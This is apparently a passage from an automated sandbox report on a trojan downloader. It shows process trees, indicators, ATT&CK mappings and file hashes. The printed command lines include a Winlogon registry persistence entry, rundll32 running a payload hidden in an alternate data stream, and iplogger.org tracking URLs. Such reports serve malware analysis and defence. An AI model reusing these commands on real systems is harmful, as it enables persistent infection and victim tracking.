603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	zzz2.exe

NTFS ADS 1 IoCs

Processes:

tempfl.exe

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\RarSFX0\changelog.txt:v01 tempfl.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\RarSFX0\changelog.txt:v01	tempfl.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmpzzz.exezzz2.exem.exef.exexcoreduo.exezzz2.exerefvs.exexcoreduo.exexcoreduo.exexcoreduo.exexcoreduo.exe

pid	process
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
968	zzz.exe
568	zzz2.exe
968	zzz.exe
968	zzz.exe
568	zzz2.exe
1308	m.exe
1036	f.exe
1308	m.exe
3988	xcoreduo.exe
3600	zzz2.exe
3600	zzz2.exe
3988	xcoreduo.exe
3988	xcoreduo.exe
1356	refvs.exe
2480	xcoreduo.exe
1356	refvs.exe
1356	refvs.exe
2480	xcoreduo.exe
2480	xcoreduo.exe
2192	xcoreduo.exe
3680	xcoreduo.exe
3680	xcoreduo.exe
3680	xcoreduo.exe
1840	xcoreduo.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

222.exezzz.exeflesh.exezzz2.exem.exef.exexcoreduo.exezzz2.exerefvs.exexcoreduo.exexcoreduo.exexcoreduo.exexcoreduo.exe

description	pid	process
Token: SeDebugPrivilege	1688	222.exe
Token: SeShutdownPrivilege	1688	222.exe
Token: SeDebugPrivilege	968	zzz.exe
Token: SeDebugPrivilege	920	flesh.exe
Token: SeDebugPrivilege	568	zzz2.exe
Token: SeDebugPrivilege	1308	m.exe
Token: SeDebugPrivilege	1036	f.exe
Token: SeDebugPrivilege	3988	xcoreduo.exe
Token: SeDebugPrivilege	3600	zzz2.exe
Token: SeDebugPrivilege	1356	refvs.exe
Token: SeDebugPrivilege	2480	xcoreduo.exe
Token: SeDebugPrivilege	2192	xcoreduo.exe
Token: SeDebugPrivilege	3680	xcoreduo.exe
Token: SeDebugPrivilege	1840	xcoreduo.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmpiexplore.exeiexplore.exeiexplore.exeiexplore.exeiexplore.exe

pid	process
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
1584	iexplore.exe
544	iexplore.exe
1004	iexplore.exe
452	iexplore.exe
1264	iexplore.exe

Suspicious use of SetWindowsHookEx 30 IoCs

Processes:

222.exeiexplore.exeiexplore.exeiexplore.exeiexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
1688	222.exe
1688	222.exe
1004	iexplore.exe
1004	iexplore.exe
544	iexplore.exe
544	iexplore.exe
452	iexplore.exe
452	iexplore.exe
1584	iexplore.exe
1584	iexplore.exe
1264	iexplore.exe
1264	iexplore.exe
2280	IEXPLORE.EXE
2264	IEXPLORE.EXE
2272	IEXPLORE.EXE
2288	IEXPLORE.EXE
2312	IEXPLORE.EXE
2280	IEXPLORE.EXE
2312	IEXPLORE.EXE
2264	IEXPLORE.EXE
2272	IEXPLORE.EXE
2288	IEXPLORE.EXE
2972	IEXPLORE.EXE
2972	IEXPLORE.EXE
3104	IEXPLORE.EXE
3104	IEXPLORE.EXE
2280	IEXPLORE.EXE
2280	IEXPLORE.EXE
3308	IEXPLORE.EXE
3308	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 233 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exeSecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmpDone.execmd.exe

description	pid	process	target process
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 1056 wrote to memory of 2036	1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
PID 2036 wrote to memory of 1664	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1664	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1664	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1664	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1700	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1700	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1700	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 1700	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 824	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 824	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 824	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 824	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 756	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 756	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 756	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 756	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 428	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	Done.exe
PID 2036 wrote to memory of 428	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	Done.exe
PID 2036 wrote to memory of 428	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	Done.exe
PID 2036 wrote to memory of 428	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	Done.exe
PID 2036 wrote to memory of 1308	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	m.exe
PID 2036 wrote to memory of 1308	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	m.exe
PID 2036 wrote to memory of 1308	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	m.exe
PID 2036 wrote to memory of 1308	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	m.exe
PID 2036 wrote to memory of 1036	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	f.exe
PID 2036 wrote to memory of 1036	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	f.exe
PID 2036 wrote to memory of 1036	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	f.exe
PID 2036 wrote to memory of 1036	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	f.exe
PID 2036 wrote to memory of 948	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 948	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 948	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 948	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	cmd.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 2036 wrote to memory of 920	2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp	flesh.exe
PID 428 wrote to memory of 1896	428	Done.exe	cmd.exe
PID 428 wrote to memory of 1896	428	Done.exe	cmd.exe
PID 428 wrote to memory of 1896	428	Done.exe	cmd.exe
PID 428 wrote to memory of 1896	428	Done.exe	cmd.exe
PID 1896 wrote to memory of 1688	1896	cmd.exe	222.exe
PID 1896 wrote to memory of 1688	1896	cmd.exe	222.exe
PID 1896 wrote to memory of 1688	1896	cmd.exe	222.exe
PID 1896 wrote to memory of 1688	1896	cmd.exe	222.exe
PID 1896 wrote to memory of 1844	1896	cmd.exe	hello_C# (2).exe
PID 1896 wrote to memory of 1844	1896	cmd.exe	hello_C# (2).exe
PID 1896 wrote to memory of 1844	1896	cmd.exe	hello_C# (2).exe
PID 1896 wrote to memory of 1844	1896	cmd.exe	hello_C# (2).exe
PID 1896 wrote to memory of 1668	1896	cmd.exe	hello_C#.exe
PID 1896 wrote to memory of 1668	1896	cmd.exe	hello_C#.exe
PID 1896 wrote to memory of 1668	1896	cmd.exe	hello_C#.exe
PID 1896 wrote to memory of 1668	1896	cmd.exe	hello_C#.exe
PID 1896 wrote to memory of 968	1896	cmd.exe	zzz.exe
PID 1896 wrote to memory of 968	1896	cmd.exe	zzz.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1056

C:\Users\Admin\AppData\Local\Temp\is-H11UV.tmp\SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H11UV.tmp\SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp" /SL5="$3015C,8956095,58368,C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://mail.google.com/"
3⤵
PID:1664

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://mail.google.com/
4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:544

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:544 CREDAT:275457 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2288

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:544 CREDAT:340994 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3308

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://google.com/"
3⤵
PID:1700

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://google.com/
4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1004

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1004 CREDAT:275457 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2272

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1004 CREDAT:340994 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2972

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1004 CREDAT:1586182 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3104

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1wgXk7"
3⤵
PID:824

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1wgXk7
4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:452

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:452 CREDAT:275457 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1GHnh7"
3⤵
PID:756

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1GHnh7
4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1264

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1264 CREDAT:275457 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2312

C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe
"C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "222.exe" & start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "zzz.exe" & start "" "zzz2.exe" &
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1896

C:\Users\Admin\AppData\Local\Temp\222.exe
"222.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1688

C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe
"hello_C# (2).exe"
5⤵
- Executes dropped EXE
PID:1844

C:\Users\Admin\AppData\Local\Temp\hello_C#.exe
"hello_C#.exe"
5⤵
- Executes dropped EXE
PID:1668

C:\Users\Admin\AppData\Local\Temp\zzz.exe
"zzz.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Documents\updates\\xcoreduo.exe,"
6⤵
PID:2980

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Documents\updates\\xcoreduo.exe,"
7⤵
- Modifies WinLogon for persistence
PID:1884

C:\Users\Admin\Documents\updates\xcoreduo.exe
"C:\Users\Admin\Documents\updates\xcoreduo.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\Documents\updates\xcoreduo.exe
"C:\Users\Admin\Documents\updates\xcoreduo.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Users\Admin\Documents\updates\xcoreduo.exe
"C:\Users\Admin\Documents\updates\xcoreduo.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680

C:\Users\Admin\Documents\updates\xcoreduo.exe
"C:\Users\Admin\Documents\updates\xcoreduo.exe"
9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Users\Admin\AppData\Local\Temp\zzz2.exe
"zzz2.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Users\Admin\AppData\Local\Temp\zzz2.exe
"C:\Users\Admin\AppData\Local\Temp\zzz2.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Users\Admin\AppData\Local\Temp\refvs.exe
"C:\Users\Admin\AppData\Local\Temp\refvs.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356

C:\Users\Admin\Documents\updates\xcoreduo.exe
"C:\Users\Admin\Documents\updates\xcoreduo.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Program Files (x86)\Margin Trade\Margin\Undelete360\m.exe
"C:\Program Files (x86)\Margin Trade\Margin\Undelete360\m.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Program Files (x86)\Margin Trade\Margin\Undelete360\f.exe
"C:\Program Files (x86)\Margin Trade\Margin\Undelete360\f.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Users\Admin\AppData\Local\Temp\tempfl.exe
"C:\Users\Admin\AppData\Local\Temp\tempfl.exe"
4⤵
- Executes dropped EXE
- NTFS ADS
PID:3648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min update.bat
5⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K update.bat
6⤵
PID:3780

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:3808

C:\Windows\SysWOW64\timeout.exe
timeout -t 2
7⤵
- Delays execution with timeout.exe
PID:3832

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\System32\rundll32.exe changelog.txt:v01, Prepare
7⤵
PID:3848

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe changelog.txt:v01, Prepare
8⤵
- Loads dropped DLL
PID:3860

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe changelog.txt:v01, Prepare
9⤵
- Loads dropped DLL
PID:3876

C:\Windows\SysWOW64\timeout.exe
timeout -t 2
7⤵
- Delays execution with timeout.exe
PID:3932

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
7⤵
- Gathers network information
PID:4088

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1wMcz7"
3⤵
PID:948

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1wMcz7
4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1584

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1584 CREDAT:275457 /prefetch:2
5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2264

C:\Program Files (x86)\Margin Trade\Margin\Undelete360\flesh.exe
"C:\Program Files (x86)\Margin Trade\Margin\Undelete360\flesh.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Users\Admin\AppData\Local\Temp\explorer.exe
C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Users\Admin\AppData\Local\Temp\start.vbs
1⤵
- Executes dropped EXE
PID:3908

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe

MD5
eb93037c1434d86cdbd4a73b31c142d6

SHA1
5c8841cf47f1758690efc3bb1ebe021308dd6b54

SHA256
157ed36da50ff261bb488a490da805746bc680c71263cd6c5812fb9608018a41

SHA512
9e9f31f98f8faacbf02db45b313ef175c432cf345d573e85ed33382634b74d515f63898bbf202feb016779fe0b242c99d78f8d1c0348955d7a518893d246cfea

Download Submit
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe

MD5
eb93037c1434d86cdbd4a73b31c142d6

SHA1
5c8841cf47f1758690efc3bb1ebe021308dd6b54

SHA256
157ed36da50ff261bb488a490da805746bc680c71263cd6c5812fb9608018a41

SHA512
9e9f31f98f8faacbf02db45b313ef175c432cf345d573e85ed33382634b74d515f63898bbf202feb016779fe0b242c99d78f8d1c0348955d7a518893d246cfea

Download Submit
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\f.exe

MD5
9c5c5395d7a409af4bef30e65ccaeb39

SHA1
5c941425027322b9f17f4759ec160999a55fdb82

SHA256
70fb3c1216052d54cf3a4aae52e70502b63b44c166769990148d1439eb2d7dea

SHA512
6666b1d2fb5761604cde7e89cb43f72cfe1e8453152242876ebc227f4a64458b38d9ecc662088aa78f49e4fe47d31b3c049b30d9b2cd42d4ee018e521744544e

Download Submit
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\flesh.exe

MD5
16cb612646d09a2866f593d91c0c769b

SHA1
f1acd32e0b7d01c49dbaccbf6beac72413c88191

SHA256
acbd523e5ccefad505a5e971f12b7e842aa7ef3c07cba78488c02a5a2ef07018

SHA512
468c72b1c05b23e74b1a04970e33e9fa7936406603db6921bd1b7ae37357c3b3720d4e4cfafa3816de7b44c4389d673711fea8a000b4ccf1245f03772d693216

Download Submit
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\flesh.exe

MD5
16cb612646d09a2866f593d91c0c769b

SHA1
f1acd32e0b7d01c49dbaccbf6beac72413c88191

SHA256
acbd523e5ccefad505a5e971f12b7e842aa7ef3c07cba78488c02a5a2ef07018

SHA512
468c72b1c05b23e74b1a04970e33e9fa7936406603db6921bd1b7ae37357c3b3720d4e4cfafa3816de7b44c4389d673711fea8a000b4ccf1245f03772d693216

Download Submit
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\m.exe

MD5
1622f0cbd9e1829ff1c0bc94ea624081

SHA1
2926255650e190b0ed32a75e9ff2657cd86319b9

SHA256
aa623268a29618071968754d2dda90959602de99dc636de2452bb6c0359e7b56

SHA512
b3c792dc2aa836a883b258619e26bffe59d14a3fbdc21697aaa1418756d83fc55a187594616f45cb3eae9683680cb06093bbcd98f03c376b06065cc8370ebef9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5
f4026be98ff3846eb5bddba81c1aadb1

SHA1
a704562a673b08b505a8e6b1c408a88315b10ca8

SHA256
15ca074712f92d2b82c3bd6c46f069824cee697f9451d99ac9956ae9dfb1fea9

SHA512
7563c933e7c7353307e7f5966542e193d370800262cad4c81813a78d0f45fb82504ce926cf5e6e163ff4cc8eaf9f50a3ad6e47029cd9f3489212a24adbb64e0a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA

MD5
3ab62f9e4fd195ad6199d96a4f6fb7c8

SHA1
2c1e21fc859d8e1c8a5478f9ced422e589c2d378

SHA256
55597ab04e67f2de536fd89721b3b3d4f47ea9379cbf0751015e619656d4469e

SHA512
e77145a865c98f146f0970f847407ab68428dbb9910453e85365f307d96297954904df9789d97eb632fce56d6907fc01ad17168e00c043c10c14993d604b14f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA

MD5
3ab62f9e4fd195ad6199d96a4f6fb7c8

SHA1
2c1e21fc859d8e1c8a5478f9ced422e589c2d378

SHA256
55597ab04e67f2de536fd89721b3b3d4f47ea9379cbf0751015e619656d4469e

SHA512
e77145a865c98f146f0970f847407ab68428dbb9910453e85365f307d96297954904df9789d97eb632fce56d6907fc01ad17168e00c043c10c14993d604b14f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
9a355fddbd73cb7b7b279d57b6ca1f98

SHA1
994c5e7b24cb60f3ed082c1053b2b113594abfe4

SHA256
725f4d59a1694a58592a10b655a48c8c4ec66f9c52b1403655c4332c1b083f4c

SHA512
d7fb484e3561471186b2cec94949ee2ba209edce7768b15b8cad3e2d17e391c2b9caef32ee62a6c68c81984b82b8e4256ea90576c833e1f311b747dfc5203a77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
9a355fddbd73cb7b7b279d57b6ca1f98

SHA1
994c5e7b24cb60f3ed082c1053b2b113594abfe4

SHA256
725f4d59a1694a58592a10b655a48c8c4ec66f9c52b1403655c4332c1b083f4c

SHA512
d7fb484e3561471186b2cec94949ee2ba209edce7768b15b8cad3e2d17e391c2b9caef32ee62a6c68c81984b82b8e4256ea90576c833e1f311b747dfc5203a77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
9a355fddbd73cb7b7b279d57b6ca1f98

SHA1
994c5e7b24cb60f3ed082c1053b2b113594abfe4

SHA256
725f4d59a1694a58592a10b655a48c8c4ec66f9c52b1403655c4332c1b083f4c

SHA512
